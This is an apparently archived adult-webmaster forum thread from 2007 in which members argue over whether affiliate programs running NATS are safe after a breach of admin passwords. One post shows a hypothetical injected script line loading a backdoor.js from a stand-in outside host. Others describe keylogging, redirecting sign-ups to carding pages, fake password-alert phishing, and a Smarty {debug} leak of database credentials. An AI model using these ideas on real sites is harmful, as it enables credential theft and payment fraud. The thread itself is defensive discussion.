patched & safe NATS programs

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • HunkyLuke
    Virgin by request ;)
    • Feb 2002
    • 1924

    #1

    patched & safe NATS programs

    Here is the list of affiliate sites that I have heard from so far who have confirmed their NATS installations have been "patched", ie, all recommended safety precautions have been taken:
    HunkMoney
    IslandDollars
    ZBuckZ
    HapiCash

    Who else? Please add any other affiliate programs that have confirmed they have addressed this issue, as recommended by TMM. Program owners, if you have already taken actions, please let us know here!

    cheers,
    Luke
    Last edited by HunkyLuke; 12-26-2007, 10:28 AM.
  • TheDoc
    Too lazy to set a custom title
    • Jul 2001
    • 13827

    #2
    You can add all NATS programs to that list now.

    Once TMM found out about this they went in and changed the PW's on programs they had access for. They didn't keep the new info, just fyi.

    Everyone else would have had IP protection in place or previously had removed/changed the TMM account details. Meaning the data was already secure.
    ~TheDoc - ICQ7765825
    It's all disambiguation

    Comment

    • HunkyLuke
      Virgin by request ;)
      • Feb 2002
      • 1924

      #3
      Thanks TheDoc, I must have missed that in all the threads recently!

      cheers,
      Luke

      Comment

      • uno
        RIP Dodger. BEST.CAT.EVER
        • Dec 2002
        • 18450

        #4
        Originally posted by TheDoc
        You can add all NATS programs to that list now.

        Once TMM found out about this they went in and changed the PW's on programs they had access for. They didn't keep the new info, just fyi.

        Everyone else would have had IP protection in place or previously had removed/changed the TMM account details. Meaning the data was already secure.
        PanchoDog has had IP protection for a very long time.
        -uno
        icq: 111-914
        CrazyBabe.com - porn art
        MojoHost - For all your hosting needs, present and future. Tell them I sent ya!

        Comment

        • TheDoc
          Too lazy to set a custom title
          • Jul 2001
          • 13827

          #5
          Originally posted by uno
          PanchoDog has had IP protection for a very long time.
          Good stuff.. I really think a great deal of clients did use the protection.

          I was avoiding listing all the people that I know did use the Ip protection. Ya miss a few people and the ICQ's of butt hurt people start
          ~TheDoc - ICQ7765825
          It's all disambiguation

          Comment

          • SmokeyTheBear
            ►SouthOfHeaven
            • Jun 2004
            • 28609

            #6
            wait wait wait , gotta set things straight here.

            In my opinion no sponsors are safe until they have had a security audit.

            The nats admins usernames were stolen, there are hundreds of places the hacker could have injected code that is still UNACTIVATED. regardless of if the admins have been removed, ip's locked down and patched up..

            just because you are patched, doesnt mean you are safe. I suggest all sponsors who want to make sure not only for themselves but for their affiliates should clarify if they had a security audit and what was done in the audit. I suggest that any nats sponsor that was compromised using the nats admins passwords should probably send the bill to nats for the security audit or ask nats to supply you one. but this is only my opinion, i have no idea if nats plans on paying for these.
            hatisblack at yahoo.com

            Comment

            • TheDoc
              Too lazy to set a custom title
              • Jul 2001
              • 13827

              #7
              Smokey, I thought about this more.. I agree, but overall... Not really.

              They can't run/upload/execute anything without it being a plugin / script uploaded via FTP first. You can't upload or add anything to the system via the NATS admin. Smarty won't run php, can't do includes, won't do redirects.. NATS locked down several exploitable parts of smarty already.

              So other than direct join template changes or an iframe exploit in the admin templates (which would take 2 seconds to look and see).. I don't really think they could do much damage this way.

              Now, they could have deleted members, webmasters, templates, sites, programs, ect.. A small issue needles to say.
              ~TheDoc - ICQ7765825
              It's all disambiguation

              Comment

              • Theo
                HAL 9000
                • May 2001
                • 34515

                #8
                TheDoc is right on this.

                Comment

                • chri$tian
                  Confirmed User
                  • Aug 2003
                  • 2468

                  #9
                  Our IP protection to the admin of NATS was put in place early last week before this news broke, but I agree with TheDoc.. More needs to be done.
                  http://www.3dsex.com

                  Comment

                  • borked
                    Totally Borked
                    • Feb 2005
                    • 6284

                    #10
                    Originally posted by Soul_Rebel
                    TheDoc is right on this.
                    Nope, Smokey is right on this one.

                    for those of you that don't know Smarty, the template engine for NATS, all one needs to do is add
                    {debug}
                    to any template and you've given away a *lot* of info.

                    A *FULL* security audit is required by *EVERY* programme that runs NATS. Period.

                    For coding work - hit me up on andy // borkedcoder // com
                    (consider figuring out the email as test #1)



                    All models are wrong, but some are useful. George E.P. Box. p202

                    Comment

                    • borked
                      Totally Borked
                      • Feb 2005
                      • 6284

                      #11
                      Originally posted by AtlasChris
                      Our IP protection to the admin of NATS was put in place early last week before this news broke, but I agree with TheDoc.. More needs to be done.
                      I know you guys lock down your MySQL to specific IPs - not everyone is so tight.

                      For coding work - hit me up on andy // borkedcoder // com
                      (consider figuring out the email as test #1)



                      All models are wrong, but some are useful. George E.P. Box. p202

                      Comment

                      • SmokeyTheBear
                        ►SouthOfHeaven
                        • Jun 2004
                        • 28609

                        #12
                        Originally posted by TheDoc
                        So other than direct join template changes or an iframe exploit in the admin templates (which would take 2 seconds to look and see)..
                        it would only take 2 seconds to look and see obvious non-human logins in the nats admin but they missed that for months right .. if you dont look for things they are hard to see .. if they were smart enough to steal the master nats passwd list and build software to remotely retrieve data on a daily basis from numerous sponsors , it doesn't seem a far stretch they would do something as simple as edit a template and drop in a few backdoor scripts incase the admin ever found out the password list was compromised. infact i would think that would be the very very first thing they would do..
                        hatisblack at yahoo.com

                        Comment

                        • TheDoc
                          Too lazy to set a custom title
                          • Jul 2001
                          • 13827

                          #13
                          Originally posted by borked
                          {debug}
                          This tells you about errors and what smarty calls to make. You can not call everything from the debug menu into a nats template. It isn't a security issue of any kind.

                          MYSQL has nothing to do with this, nor protecting mysql. The IP lock feature is within the Admin area and instantly stopped this attack from happening.


                          Originally posted by SmokeyTheBear
                          it would only take 2 seconds to look and see obvious non-human logins in the nats admin but they missed that for months right .. if you dont look for things they are hard to see .. if they were smart enough to steal the master nats passwd list and build software to remotely retrieve data on a daily basis from numerous sponsors , it doesn't seem a far stretch they would do something as simple as edit a template and drop in a few backdoor scripts incase the admin ever found out the password list was compromised. infact i would think that would be the very very first thing they would do..
                          Looking at the logins vs looking at discolored admin templates which never flip ownership, really stands out in NATS. Logins, not so much.

                          You can't do anything with the templates, you can't execute, upload, backdoor anything. They are nothing more than text files, executed as text/html.

                          The password list is TMM admin accounts on NATS. Not ALL NATS admin accounts or any other admins, webmasters, ect.. Only the TMM admin accounts were breached.
                          Last edited by TheDoc; 12-26-2007, 01:46 PM.
                          ~TheDoc - ICQ7765825
                          It's all disambiguation

                          Comment

                          • SmokeyTheBear
                            ►SouthOfHeaven
                            • Jun 2004
                            • 28609

                            #14
                            Originally posted by TheDoc
                            You can't do anything with the templates, you can't execute, upload, backdoor anything. They are nothing more than text files, executed as text/html..
                            script src=http://secretstuff.com/backdoor.js

                            could be empty right now (i.e unnoticed) and waiting to scoop
                            hatisblack at yahoo.com

                            Comment

                            • TheDoc
                              Too lazy to set a custom title
                              • Jul 2001
                              • 13827

                              #15
                              Originally posted by SmokeyTheBear
                              script src=http://secretstuff.com/backdoor.js

                              could be empty right now (i.e unnoticed) and waiting to scoop
                              What could it do other than run local js on a pc?
                              ~TheDoc - ICQ7765825
                              It's all disambiguation

                              Comment

                              • TheDoc
                                Too lazy to set a custom title
                                • Jul 2001
                                • 13827

                                #16
                                Wait, yeah duh, key stroker.. I can check some programs right fast, most people never touch the admin templates so it really only takes a second to look. And I check the access template since it's the first.

                                Outside of those, unless you point out a different reason, I don't see that this would do anything.
                                ~TheDoc - ICQ7765825
                                It's all disambiguation

                                Comment

                                • SmokeyTheBear
                                  ►SouthOfHeaven
                                  • Jun 2004
                                  • 28609

                                  #17
                                  Originally posted by TheDoc
                                  What could it do other than run local js on a pc?
                                  well it could redirect joins that would be pretty bad.

                                  if it redirected the joins to a carding page that would be even worse.
                                  hatisblack at yahoo.com

                                  Comment

                                  • borked
                                    Totally Borked
                                    • Feb 2005
                                    • 6284

                                    #18
                                    Originally posted by TheDoc
                                    This tells you about errors and what smarty calls to make. You can not call everything from the debug menu into a nats template. It isn't a security issue of any kind.

                                    MYSQL has nothing to do with this, nor protecting mysql. The IP lock feature is within the Admin area and instantly stopped this attack from happening.

                                    Oh I'm sorry, maybe I was misreading the $config array output from {debug}

                                    {$config} Array (168)
                                    DB_SERVER => "xxxxxxx"
                                    DB_USER => "xxxxxxx"
                                    DB_PASSWORD => "xxxxxxx"
                                    DB_DB => "xxxxxxx"

                                    My bad, this has nothing to do with mysql at all.

                                    For coding work - hit me up on andy // borkedcoder // com
                                    (consider figuring out the email as test #1)



                                    All models are wrong, but some are useful. George E.P. Box. p202

                                    Comment

                                    • TheDoc
                                      Too lazy to set a custom title
                                      • Jul 2001
                                      • 13827

                                      #19
                                      Originally posted by SmokeyTheBear
                                      well it could redirect joins that would be pretty bad.

                                      if it redirected the joins to a carding page that would be even worse.
                                      ok, they do need to be checked.. But prob more focused on the join forms, give admin templates a quick one over, and hand check the access template.

                                      Either way though, nobody is uploading, adding code, creating a backdoor, ect through the NATS admin. However, nasty shit can be done either way.
                                      ~TheDoc - ICQ7765825
                                      It's all disambiguation

                                      Comment

                                      • SmokeyTheBear
                                        ►SouthOfHeaven
                                        • Jun 2004
                                        • 28609

                                        #20
                                        Originally posted by TheDoc
                                        ok, they do need to be checked.. But prob more focused on the join forms, give admin templates a quick one over, and hand check the access template.
                                        before they are given the all clean.

                                        I dont wanna give away too much but fact is the basics got overlooked or this would have been noticed by both nats and the sponsors themselves ages ago ( or was and was ignored ) if someone was smart they likely knew this wouldnt last forever ( admin access ) , place a small js for a fake " nats update your password security alert" in the admin section , so when sponsors learn of this right now like they have they would think oh gee this must be legit" wham bam recompromised
                                        hatisblack at yahoo.com

                                        Comment

                                        • AlienQ - BANNED FOR LIFE
                                          best designer on GFY
                                          • Mar 2003
                                          • 30307

                                          #21
                                          I think this subject is....

                                          Comment

                                          • will76
                                            Making $$$$ w/ ClickCash
                                            • May 2003
                                            • 18037

                                            #22
                                            getting TheDoc to be carefull on this issue seems to be near impossible. He has been down playing this from day 1 when he was saying he "seems to believe that only emails were stolen". This thread is a perfect example of someone being too quick to give the " all clear" and wanting the issue to be down played and to go away. If smokey wouldn't have convinced him after several posts, people would be reading the doc's inital posts here saying that all NATS programs were now safe. Another assumption he obviously knows nothing about. I'm not bashing on NATS but i agree with SMokey it would be wise to have an audit of yoru server to double check everything, where as the doc would tell it is all fine, nothing to worry about.
                                            Last edited by will76; 12-26-2007, 02:21 PM.
                                            ICQ: 86364801 Email: will [at] innovativeassets [dot] com

                                            PROGRAM SHIT LIST - DO NOT PROMOTE (click link for gfy thread)
                                            FNCash | Media Revenue

                                            Comment

                                            • TheDoc
                                              Too lazy to set a custom title
                                              • Jul 2001
                                              • 13827

                                              #23
                                              Originally posted by will76
                                              getting TheDoc to be carefull on this issue seems to be near impossible. He has been down playing this from day 1 when he was saying he "seems to believe that only emails were stolen". This thread is a perfect example of someone being too quick to give the " all clear" and wanting the issue to be down played and to go away. If smokey wouldn't have convinced him after several posts, people would be reading the doc's inital posts here saying that all NATS programs were now safe. Another assumption he obviously knows nothing about.
                                              I'm talking to Smokey over ICQ about this well before this post was made. I haven't given the all clear to anything. I'm hear to learn so I can educate my clients and NATS on what to do.. Please don't confuse me with some jackass.

                                              I still DON'T think a program needs to do a check. But to be safe they might as well. With the console issue or 1000 other possible problems, the fact remains the ONLY got email / member data.


                                              Don't pull me into your little twisted post games or I will eat you alive and spit your ass back out.
                                              Last edited by TheDoc; 12-26-2007, 02:24 PM.
                                              ~TheDoc - ICQ7765825
                                              It's all disambiguation

                                              Comment

                                              • WiredGuy
                                                Pounding Googlebot
                                                • Aug 2002
                                                • 34512

                                                #24
                                                Originally posted by AlienQ
                                                I think this subject is....

                                                I think its just beginning.
                                                WG
                                                I play with Google.

                                                Comment

                                                • TheDoc
                                                  Too lazy to set a custom title
                                                  • Jul 2001
                                                  • 13827

                                                  #25
                                                  Originally posted by borked
                                                  Oh I'm sorry, maybe I was misreading the $config array output from {debug}

                                                  {$config} Array (168)
                                                  DB_SERVER => "xxxxxxx"
                                                  DB_USER => "xxxxxxx"
                                                  DB_PASSWORD => "xxxxxxx"
                                                  DB_DB => "xxxxxxx"

                                                  My bad, this has nothing to do with mysql at all.
                                                  Now back to you.. Interesting and you are correct.

                                                  Can it be removed and still have the debug console?

                                                  I went in and checked 5 people, only 2 of us (me included) have the debug on. I don't remember turning my on but I am going to get my host to tell me how to turn it on/off.

                                                  I would bet though, now that you pointed this out, more changes will be made. That damn console is handy but that could be deadly.

                                                  Again, pointing out at how bad it could have been - vs what it really was.
                                                  ~TheDoc - ICQ7765825
                                                  It's all disambiguation

                                                  Comment

                                                  • will76
                                                    Making $$$$ w/ ClickCash
                                                    • May 2003
                                                    • 18037

                                                    #26
                                                    Originally posted by TheDoc
                                                    I'm talking to Smokey over ICQ about this well before this post was made. I haven't given the all clear to anything. I'm hear to learn so I can educate my clients and NATS on what to do.. Please don't confuse me with some jackass.

                                                    I still DON'T think a program needs to do a check. But to be safe they might as well. With the console issue or 1000 other possible problems, the fact remains the ONLY got email / member data.


                                                    Don't pull me into your little twisted post games or I will eat you alive and spit your ass back out.
                                                    game? here i am telling people to error on caution and you are telling them the complete opposite.


                                                    TITLE OF THIS THREAD:
                                                    patched & safe NATS programs
                                                    your reply:
                                                    Originally posted by TheDoc
                                                    You can add all NATS programs to that list now.
                                                    RIGHT FUCKING THERE you say you can add all programs to the safe list. Then after several of smokey's posts you post:
                                                    ok, they do need to be checked..
                                                    Now you are saying

                                                    I still DON'T think a program needs to do a check.
                                                    So you want to resort to personal attacks / threats now? No need for me to play games or twist things when all I need to do is quote you.
                                                    ICQ: 86364801 Email: will [at] innovativeassets [dot] com

                                                    PROGRAM SHIT LIST - DO NOT PROMOTE (click link for gfy thread)
                                                    FNCash | Media Revenue

                                                    Comment

                                                    • TheDoc
                                                      Too lazy to set a custom title
                                                      • Jul 2001
                                                      • 13827

                                                      #27
                                                      Yes, Will76, NATS has been "Patched and is now Safe".. That is 100% correct.

                                                      Please take your drama bullshit to another thread and let us adults conduct business.
                                                      ~TheDoc - ICQ7765825
                                                      It's all disambiguation

                                                      Comment

                                                      • JOKER
                                                        Facit Omnia Voluntas
                                                        • Apr 2003
                                                        • 2105

                                                        #28
                                                        Originally posted by TheDoc
                                                        I still DON'T think a program needs to do a check. But to be safe they might as well.
                                                        And I think giving programs / affiliates a false sense of security might not be the best idea, but of course that's just me.

                                                        Originally posted by TheDoc
                                                        With the console issue or 1000 other possible problems, the fact remains the ONLY got email / member data.
                                                        John himself stated that they had access to everything an admin would have access to - yet you're saying it's a FACT that they only got email / member data - how can you be so sure, have you done a full security audit to programs that you have access to? How can you be so sure, if you don't know what these guys are really capable of?

                                                        No offense, really - and believe me, I'd like to see this go away as fast as every other webmaster / program owner as well, it's just that you know, better be safe and 100% sure than sorry.

                                                        It's great that there is work being done and that you're a part of it
                                                        Facilitation - BizDev - Traffic - Consulting - Marketing
                                                        Skype: jokerempire | Silent Circle: joker

                                                        Comment

                                                        • will76
                                                          Making $$$$ w/ ClickCash
                                                          • May 2003
                                                          • 18037

                                                          #29
                                                          Originally posted by TheDoc
                                                          Yes, Will76, NATS has been "Patched and is now Safe".. That is 100% correct.

                                                          Please take your drama bullshit to another thread and let us adults conduct business.
                                                          Thats not at question, if NATS is now safe or not. Maybe you should read the title again: NATS PROGRAMS. Someone was asking which programs using NATS was safe. You saw " NATS and SAFE" and you jumped in to say " ALL OF THEM". Obviously you still don't understand the subject of the thread since your reply is NATS has been "Patched and is now Safe".. no one has disputed that. Every one knows that it was a password list and that NATS deleted the passwords.

                                                          No Drama, and you can continue to reply with insults if you like and try to start a pissing match but I prefer to stick to the topic. Smokey pointed out where people should get their stuff checked. I agree better to be safe and do the right thing. I am just curious why you so quick to tell people that all programs using NATS on their servers are 100% safe. How do you know that? did you check everyone's servers as smokey mentioned?
                                                          Last edited by will76; 12-26-2007, 02:47 PM.
                                                          ICQ: 86364801 Email: will [at] innovativeassets [dot] com

                                                          PROGRAM SHIT LIST - DO NOT PROMOTE (click link for gfy thread)
                                                          FNCash | Media Revenue

                                                          Comment

                                                          • TheDoc
                                                            Too lazy to set a custom title
                                                            • Jul 2001
                                                            • 13827

                                                            #30
                                                            Originally posted by will76
                                                            Thats not at question, if NATS is now safe or not. Maybe you should read the title again: NATS PROGRAMS. Someone was asking which programs using NATS was safe. You saw " NATS and SAFE" and you jumped in to say " ALL OF THEM". Obviously you still don't understand the subject of the thread since your reply is NATS has been "Patched and is now Safe".. no one has disputed that. Every one knows that it was a password list and that NATS deleted the passwords.

                                                            No Drama, and you can continue to reply with insults if you like and try to start a pissing match but I prefer to stick to the topic. Smokey pointed out where people should get their stuff checked. I agree better to be safe and do the right thing. I am just curious why you so quick to tell people that all programs using NATS on their servers are 100% safe. How do you know that? did you check everyone's servers as smokey mentioned?
                                                            I think the question asked was "have confirmed their NATS installations have been "patched", ie, all recommended safety precautions have been taken"

                                                            No reason to twist this, the answer again is 100% YES! All NATS programs have had all recommenced safety precautions taken.

                                                            Everything else is how to IMPROVE on it and find more possible holes that could be exploited.

                                                            And I did agree with Smokey, and I agreed that people should check the installs. But I do not think or agree that they will find any problems due to the fact that a human didn't enter the programs, but rather a bot, which pulled information from reports. So even the debug screen is pointless, but that doesn't mean it isn't something that shouldn't be addressed for future problems.


                                                            And with you, I didn't say "all clear" as you quoted me saying. So if you want to twist my words I will continue to bash you.
                                                            ~TheDoc - ICQ7765825
                                                            It's all disambiguation

                                                            Comment

                                                            • TheDoc
                                                              Too lazy to set a custom title
                                                              • Jul 2001
                                                              • 13827

                                                              #31
                                                              Originally posted by JOKER | JOKEREMPIRE Inc.
                                                              And I think giving programs / affiliates a false sense of security might not be the best idea, but of course that's just me.
                                                              The NATS program that had been breached are now secure, that isn't false.



                                                              Originally posted by JOKER | JOKEREMPIRE Inc.
                                                              John himself stated that they had access to everything an admin would have access to - yet you're saying it's a FACT that they only got email / member data - how can you be so sure, have you done a full security audit to programs that you have access to? How can you be so sure, if you don't know what these guys are really capable of?
                                                              It was a bot, going in and pulling, it appears, 5 reports from the admin/webmaster cvs reports. These reports pull member and webmaster data when transactions come through. I think this is why Webmaster baited emails were hit harder than member emails. Harder to see who is fresh and who isn't with Members, without running an sql query.

                                                              Originally posted by JOKER | JOKEREMPIRE Inc.
                                                              No offense, really - and believe me, I'd like to see this go away as fast as every other webmaster / program owner as well, it's just that you know, better be safe and 100% sure than sorry.

                                                              It's great that there is work being done and that you're a part of it
                                                              This needed to happen, NATS needed to improve its security. It doesn't need all these people that have never used NATS telling Webmasters what they view the problem is.

                                                              So when people are saying it isn't secure, well.. You are right, but neither is any other affiliage program for that mater, or google, or anyone. So nobody can ever give the 100% all clear vote, we can only state what we know....

                                                              That nats is clear of the issue it had and we should all move on and start making more money.
                                                              Last edited by TheDoc; 12-26-2007, 03:33 PM.
                                                              ~TheDoc - ICQ7765825
                                                              It's all disambiguation

                                                              Comment

                                                              • BluMedia
                                                                Confirmed User
                                                                • Dec 2002
                                                                • 3973

                                                                #32
                                                                We took action as soon as we heard about the issue. Add IntenseCash to that list.

                                                                Mark
                                                                IntenseCash - If you can't convert us then you might want to look for a new job
                                                                .
                                                                BrokeStraightBoys.com converting 1:124 stats counted by Nats

                                                                Comment

                                                                • SkeetSkeet
                                                                  Confirmed User
                                                                  • Oct 2005
                                                                  • 5404

                                                                  #33
                                                                  we are good to go www.starlightbucks.com

                                                                  ICQ 283633188

                                                                  Comment

                                                                  • Trixxxia
                                                                    Confirmed User
                                                                    • Aug 2004
                                                                    • 5600

                                                                    #34
                                                                    MassiveDollars (and all clients of our host) have IP protection. It can be a pain in the butt sometimes but now I'm sure everyone is GLADLY going to grin rather than growl when they need to get an IP authorized.

                                                                    Despite knowing we are protected, we meticulously went through all IPs that accessed as admins to make sure everyone checked out and matched. All good there.

                                                                    Smokey, borked, quantum-x(in some other threads) and TheDoc - thanks for using your collective brains & experience to foresee any 'possible' issues and giving indications of what to look out for. I personally appreciate it and sleep better at night knowing I've dotted my 'i's' and crossed my 't's - EVEN if we were protected. Like JokerEmpire said - Better safe than sorry.

                                                                    Comment

                                                                    Working...